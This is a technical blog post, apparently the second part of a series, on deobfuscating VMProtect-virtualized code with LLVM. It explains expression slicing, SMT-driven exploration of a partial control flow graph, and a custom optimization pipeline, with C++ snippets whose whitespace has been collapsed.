I apologize for the length of the series, but I didn’t want to discard bits of information that could possibly help others approaching LLVM as a deobfuscation framework, especially knowing that, at this time, several parties are currently working on their own LLVM-based solution. I felt like showcasing its effectiveness and limitations on a well-known obfuscator was a valid way to dive through most of the details. Please note that the process described in the posts is just one of the many possible ways to approach the problem, and by no means the best way.
The source code of the proof-of-concept should be considered an experimentation playground, with everything that involves (e.g. bugs, unhandled edge cases, non production-ready quality). As a matter of fact, some of the components are barely sketched to let me focus on improving the LLVM optimization pipeline. In the future I’ll try to find the time to polish most of it, but in the meantime I hope it can at least serve as a reference to better understand the explained concepts.
Feel free to reach out with doubts, questions or even flaws you may have found in the process, I’ll be more than happy to allocate some time to discuss them.
I’d like to thank:
Peter, for introducing me to LLVM and working on SATURN together.
mrexodia and mrphrazer, for the in-depth review of the posts.
justmusjle, for enhancing the colors used by the diagrams.
Secret Club, for their suggestions and series hosting.
This post will introduce the concepts of expression slicing and partial CFG, combining them to implement an SMT-driven algorithm to explore the virtualized CFG. Finally, some words will be spent on introducing the LLVM optimization pipeline, its configuration and its limitations.
Poor man’s slicer
Slicing a symbolic expression to be able to evaluate it, throw it at an SMT solver or match it against some pattern is something extremely common in all symbolic reasoning tools. Luckily for us this capability is trivial to implement with yet another C++ helper function. This technique has been referred to as Poor man’s slicer in the SATURN paper, hence the title of the section.
In the VMProtect context we are mainly interested in slicing one expression: the next program counter. We want to do that either while exploring the single VmBlocks (that, once connected, form a VmStub) or while exploring the VmStubs (that, once connected, form a VmFunction). The following C++ code is meant to keep only the computations related to the final value of the virtual instruction pointer at the end of a VmBlock or VmStub:
extern"C"size_tHelperSlicePC(size_trax,size_trbx,size_trcx,size_trdx,size_trsi,size_trdi,size_trbp,size_trsp,size_tr8,size_tr9,size_tr10,size_tr11,size_tr12,size_tr13,size_tr14,size_tr15,size_tflags,size_tKEY_STUB,size_tRET_ADDR,size_tREL_ADDR){// Allocate the temporary virtual registersVirtualRegistervmregs[30]={0};// Allocate the temporary passing slotssize_tslots[30]={0};// Initialize the virtual registerssize_tvsp=rsp;size_tvip=0;// Force the relocation address to 0REL_ADDR=0;// Execute the virtualized codevip=HelperStub(rax,rbx,rcx,rdx,rsi,rdi,rbp,rsp,r8,r9,r10,r11,r12,r13,r14,r15,flags,KEY_STUB,RET_ADDR,REL_ADDR,vsp,vip,vmregs,slots);// Return the sliced program counterreturnvip;}
The acute observer will notice that the function definition is basically identical to the HelperFunction definition given before, with the fundamental difference that the arguments are passed by value and therefore useful if related to the computation of the sliced expression, but with their liveness scope ending at the end of the function, which guarantees that there won’t be store operations to the host context that could possibly bloat the code.
The steps to use the above helper function are:
The HelperSlicePC is cloned into a new throwaway function;
The call to the HelperStub function is swapped with a call to the VmBlock or VmStub of which we want to slice the final instruction pointer;
The called function is forcefully inlined into the HelperSlicePC function;
The optimization pipeline is executed on the cloned HelperSlicePC function resulting in the slicing of the final instruction pointer expression as a side-effect of the optimizations.
The following LLVM-IR snippet shows the idea in action, resulting in the final optimized function where the condition and edges of the conditional branch are clearly visible.
In the following section we’ll see how variations of this technique are used to explore the virtualized control flow graph, solve the conditional branches, and recover the switch cases.
Exploration
The exploration of a virtualized control flow graph can be done in different ways and usually protectors like VMProtect or Themida show a distinctive shape that can be pattern-matched with ease, simplified and parsed to obtain the outgoing edges of a conditional block.
The logic used by different VMProtect conditional jump versions has been detailed in the past, so in this section we are going to delve into an SMT-driven algorithm based on the incremental construction of the explored control flow graph and specifically built on top of the slicing logic explained in the previous section.
Given the generic nature of the detailed algorithm, nothing stops it from being used on other protectors. The usual catch is obviously caused by protections embedding hard to solve constraints that may hinder the automated solving phase, but the construction and propagation of the partial CFG constraints and expressions could still be useful in practice to pull out less automated exploration algorithms, or to identify and simplify anti-dynamic symbolic execution tricks (e.g. dummy loops leading to path explosion that could be simplified by LLVM’s loop optimization passes or custom user passes).
Partial CFG
A partial control flow graph is a control flow graph built connecting the currently explored basic blocks given the known edges between them. The idea behind building it, is that each time that we explore a new basic block, we gather new outgoing edges that could lead to new unexplored basic blocks, or even to known basic blocks. Every new edge between two blocks is therefore adding information to the entire control flow graph and we could actually propagate new useful constraints and values to enable stronger optimizations, possibly easing the solving of the conditional branches or even changing a known branch from unconditional to conditional.
Let’s look at two motivating examples of why building a partial CFG may be a good idea to be able to replicate the kind of reasoning usually implemented by symbolic execution tools, with the addition of useful built-in LLVM passes.
Motivating example #1
Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlock and purple the VmBlock of interest for the example.
Let’s assume we just solved the outgoing edges for the basic block A, obtaining two connections leading to the new basic blocks B and C. Now assume that we sliced the branch condition of the sole basic block B, obtaining an access into a constant array with a 64 bits symbolic index. Enumerating all the valid indices may be a non-trivial task, so we may want to restrict the search using known constraints on the symbolic index that, if present, are most likely going to come from the chain(s) of predecessor(s) of the basic block B.
To draw a symbolic execution parallel, this is the case where we want to collect the path constraints from a certain number of predecessors (e.g. we may want to incrementally harvest the constraints, because sometimes the needed constraint is locally near to the basic block we are solving) and chain them to be fed to an SMT solver to execute a successful enumeration of the valid indices.
Tools like Souper automatically harvest the set of path constraints while slicing an expression, so building the partial control flow graph and feeding it to Souper may be sufficient for the task. Additionally, with the LLVM API to walk the predecessors of a basic block it’s also quite easy to obtain the set of needed constraints and, when available, we may also take advantage of known-to-be-true conditions provided by the llvm.assume intrinsic.
Motivating example #2
Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlocks, purple the VmBlock of interest for the example, dashed red arrows the edges of interest for the example and the solid green arrow an edge that has just been processed.
Let’s assume we just solved the outgoing edges for the basic block E, obtaining two connections leading to a new block G and a known block B. In this case we know that we detected a jump to the previously visited block B (edge in green), which is basically forming a loop chain (B → C → E → B) and we know that starting from B we can reach two edges (B → C and D → F, marked in dashed red) that are currently known as unconditional, but that, given the newly obtained edge E → B, may not be anymore and therefore will need to be proved again. Building a new partial control flow graph including all the newly discovered basic block connections and slicing the branch of the blocks B and D may now show them as conditional.
As a real world case, when dealing with concolic execution approaches, the one mentioned above is the usual pattern that arises with index-based loops, starting with a known concrete index and running till the index reaches an upper or lower bound N. During the first N-1 executions the tool would take the same path and only at the iteration N the other path would be explored. That’s the reason why concolic and symbolic execution tools attempt to build heuristics or use techniques like state-merging to avoid running into path explosion issues (or at best executing the loop N times).
Building the partial CFG with LLVM instead, would mark the loop back edge as unconditional the first time, but building it again, including the knowledge of the newly discovered back edge, would immediately reveal the loop pattern. The outcome is that LLVM would now be able to apply its loop analysis passes, the user would be able to use the API to build ad-hoc LoopPass passes to handle special obfuscation applied to the loop components (e.g. encoded loop variant/invariant) or the SMT solvers would be able to treat newly created Phi nodes at the merge points as symbolic variables.
The following LLVM-IR snippet shows the sliced partial control flow graphs obtained during the exploration of the virtualized assembly snippet presented below.
The second partial CFG obtained during the exploration phase. The block 8 is returning the dummy 0xdeaddead (233496237) value, meaning that the VmBlock instructions haven’t been lifted yet.
The loop-optimized final CFG obtained at the completion of the exploration phase.
The FirstSlice function shows that a single unconditional branch has been detected, identifying the bytecode address 0x1400B85C1 (5369464257), this is because there’s no knowledge of the back edge and the comparison would be cmp 1, 2000. The SecondSlice function instead shows that a conditional branch has been detected selecting between the bytecode addresses 0x140073BE7 (5369183207) and 0x1400B85C1 (5369464257). The comparison is now done with a symbolic PHINode. The F_0x14000101f_WithLoopOpt and F_0x14000101f_NoLoopOpt functions show the fully devirtualized code with and without loop optimizations applied.
Pseudocode
Given the knowledge obtained from the motivating examples, the pseudocode for the automated partial CFG driven exploration is the following:
We initialize the algorithm creating:
A stack of addresses of VmBlocks to explore, referred to as Worklist;
A set of addresses of explored VmBlocks, referred to as Explored;
A set of addresses of VmBlocks to reprove, referred to as Reprove;
A map of known edges between the VmBlocks, referred to as Edges.
We push the address of the entry VmBlock into the Worklist;
We fetch the address of a VmBlock to explore, we lift it to LLVM-IR if met for the first time, we build the partial CFG using the knowledge from the Edges map and we slice the branch condition of the current VmBlock. Finally we feed the branch condition to Souper, which will process the expression harvesting the needed constraints and converting it to an SMT query. We can then send the query to an SMT solver, asking for the valid solutions, incrementally rejecting the known solutions up to some limit (worst case) or till all the solutions have been found.
Once we obtained the outgoing edges for the current VmBlock, we can proceed with updating the maps and sets:
We verify if each solved edge is leading to a known VmBlock; if it is, we verify if this connection was previously known. If unknown, it means we found a new predecessor for a known VmBlock and we proceed with adding the addresses of all the VmBlocks reachable by the known VmBlock to the Reprove set and removing them from the Explored set; to speed things up, we can eventually skip each VmBlock known to be firmly unconditional;
We update the Edges map with the newly solved edges.
At this point we check if the Worklist is empty. If it isn’t, we jump back to step 3. If it is, we populate it with all the addresses in the Reprove set, clearing it in the process and jumping back to step 3. If also the Reprove set is empty, it means we explored the whole CFG and eventually reproved all the VmBlocks that obtained new predecessors during the exploration phase.
As mentioned at the start of the section, there are many ways to explore a virtualized CFG and using an SMT-driven solution may generalize most of the steps. Obviously, it brings its own set of issues (e.g. hard to solve constraints), so one could eventually fall back to the pattern matching based solution at need. As expected, the pattern matching based solution would also blindly explore unreachable paths at times, so a mixed solution could really offer the best CFG coverage.
The pseudocode presented in this section is a simplified version of the partial CFG based exploration algorithm used by SATURN at this point in time, streamlined from a set of reasonings that are unnecessary while exploring a CFG virtualized by VMProtect.
Pipeline
So far we hinted at the underlying usage of LLVM’s optimization and analysis passes multiple times through the sections, so we can finally take a look at: how they fit in, their configuration and their limitations.
Managing the pipeline
Running the whole -O3 pipeline may not always be the best idea, because we may want to use only a subset of passes, instead of wasting cycles on passes that we know a priori don’t have any effect on the lifted LLVM-IR code. Additionally, by default, LLVM is providing a chain of optimizations which is executed once, is meant to optimize non-obfuscated code and should be as efficient as possible.
Although, in our case, we have different needs and want to be able to:
Add some custom passes to tackle context-specific problems and do so at precise points in the pipeline to obtain the best possible output, while avoiding phase ordering issues;
Iterate the optimization pipeline more than once, ideally until our custom passes can’t apply any more changes to the IR code;
Be able to pass custom flags to the pipeline to toggle some passes at will and eventually feed them with information obtained from the binary (e.g. access to the binary sections).
LLVM provides a FunctionPassManager class to craft our own pipeline, using LLVM’s passes and custom passes. The following C++ snippet shows how we can add a mix of passes that will be executed in order until there won’t be any more changes or until a threshold will be reached:
voidoptimizeFunction(llvm::Function*F,OptimizationGuide&G){// Fetch the Moduleauto*M=F->getParent();// Create the function pass managerllvm::legacy::FunctionPassManagerFPM(M);// Initialize the pipelinellvm::PassManagerBuilderPMB;PMB.OptLevel=3;PMB.SizeLevel=2;PMB.RerollLoops=false;PMB.SLPVectorize=false;PMB.LoopVectorize=false;PMB.Inliner=createFunctionInliningPass();// Add the alias analysis passesFPM.add(createCFLSteensAAWrapperPass());FPM.add(createCFLAndersAAWrapperPass());FPM.add(createTypeBasedAAWrapperPass());FPM.add(createScopedNoAliasAAWrapperPass());// Add some useful LLVM passesFPM.add(createCFGSimplificationPass());FPM.add(createSROAPass());FPM.add(createEarlyCSEPass());// Add a custom pass hereif(G.RunCustomPass1)FPM.add(createCustomPass1(G));FPM.add(createInstructionCombiningPass());FPM.add(createCFGSimplificationPass());// Add a custom pass hereif(G.RunCustomPass2)FPM.add(createCustomPass2(G));FPM.add(createGVNHoistPass());FPM.add(createGVNSinkPass());FPM.add(createDeadStoreEliminationPass());FPM.add(createInstructionCombiningPass());FPM.add(createCFGSimplificationPass());// Execute the pipelinesize_tminInsCount=F->getInstructionCount();size_tpipExeCount=0;FPM.doInitialization();do{// Reset the IR changed flagG.HasChanged=false;// Run the optimizationsFPM.run(*F);// Check if the function changedsize_tcurInsCount=F->getInstructionCount();if(curInsCount<minInsCount){minInsCount=curInsCount;G.HasChanged|=true;}// Increment the execution countpipExeCount++;}while(G.HasChanged&&pipExeCount<5);FPM.doFinalization();}
The OptimizationGuide structure can be used to pass information to the custom passes and control the execution of the pipeline.
Configuration
As previously stated, the LLVM default pipeline is meant to be as efficient as possible, therefore it’s configured with a tradeoff between efficiency and efficacy in mind. While devirtualizing big functions it’s not uncommon to see the effects of the stricter configurations employed by default. But an example is worth a thousand words.
In the Godbolt UI we can see on the left a snippet of LLVM-IR code that is storing i32 values at increasing indices of a global array named arr. The store at line 96, writing the value 91 at arr[1], is a bit special because it is fully overwriting the store at line 6, writing the value 1 at arr[1]. If we look at the upper right result, we see that the DSE pass was applied, but somehow it didn’t do its job of removing the dead store at line 6. If we look at the bottom right result instead, we see that the DSE pass managed to achieve its goal and successfully killed the dead store at line 6. The reason for the difference is entirely associated to a conservative configuration of the DSE pass, which by default (at the time of writing), is walking up to 90 MemorySSA definitions before deciding that a store is not killing another post-dominated store. Setting the MemorySSAUpwardsStepLimit to a higher value (e.g. 100 in the example) is definitely something that we want to do while deobfuscating some code.
Each pass that we are going to add to the custom pipeline is going to have configurations that may be giving suboptimal deobfuscation results, so it’s a good idea to check their C++ implementation and figure out if tweaking some of the options may improve the output.
Limitations
When tweaking some configurations is not giving the expected results, we may have to dig deeper into the implementation of a pass to understand if something is hindering its job, or roll up our sleeves and develop a custom LLVM pass. Some examples on why digging into a pass implementation may lead to fruitful improvements follow.
IsGuaranteedLoopInvariant (DSE, MSSA)
While looking at some devirtualized code, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diffs: D96979, D97155. The bottom line is that the IsGuarenteedLoopInvariant function used by the DSE and MSSA passes was not using the safe assumption that a pointer computed in the entry block is, by design, guaranteed to be loop invariant as the entry block of a Function is guaranteed to have no predecessors and not to be part of a loop.
GetPointerBaseWithConstantOffset (DSE)
While looking at some devirtualized code that was accessing memory slots of different sizes, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diff: D97676. The bottom line is that while computing the partially overlapping memory stores, the DSE was considering only memory slots with the same base address, ignoring fully overlapping stores offsetted between each other. The solution is making use of another patch which is providing information about the offsets of the memory slots: D93529.
Shift-Select folding (InstCombine)
And obviously there is no two without three! Nah, just kidding, a patch I wanted to get accepted to simplify one of the recurring patterns in the computation of the VMProtect conditional branches has been on pause because InstCombine is an extremely complex piece of code and additions to it, especially if related to uncommon patterns, are unwelcome and seen as possibly bloating and slowing down the entire pipeline. Additional information on the pattern and the reasons that hinder its folding are available in the following differential: D84664. Nothing stops us from maintaining our own version of InstCombine as a custom pass, with ad-hoc patterns specifically selected for the obfuscation under analysis.
What’s next?
In Part 3 we’ll have a look at a list of custom passes necessary to reach a superior output quality. Then, some words will be spent on the handling of the unsupported instructions and on the recompilation process. Last but not least, the output of 6 devirtualized functions, with varying code constructs, will be shown.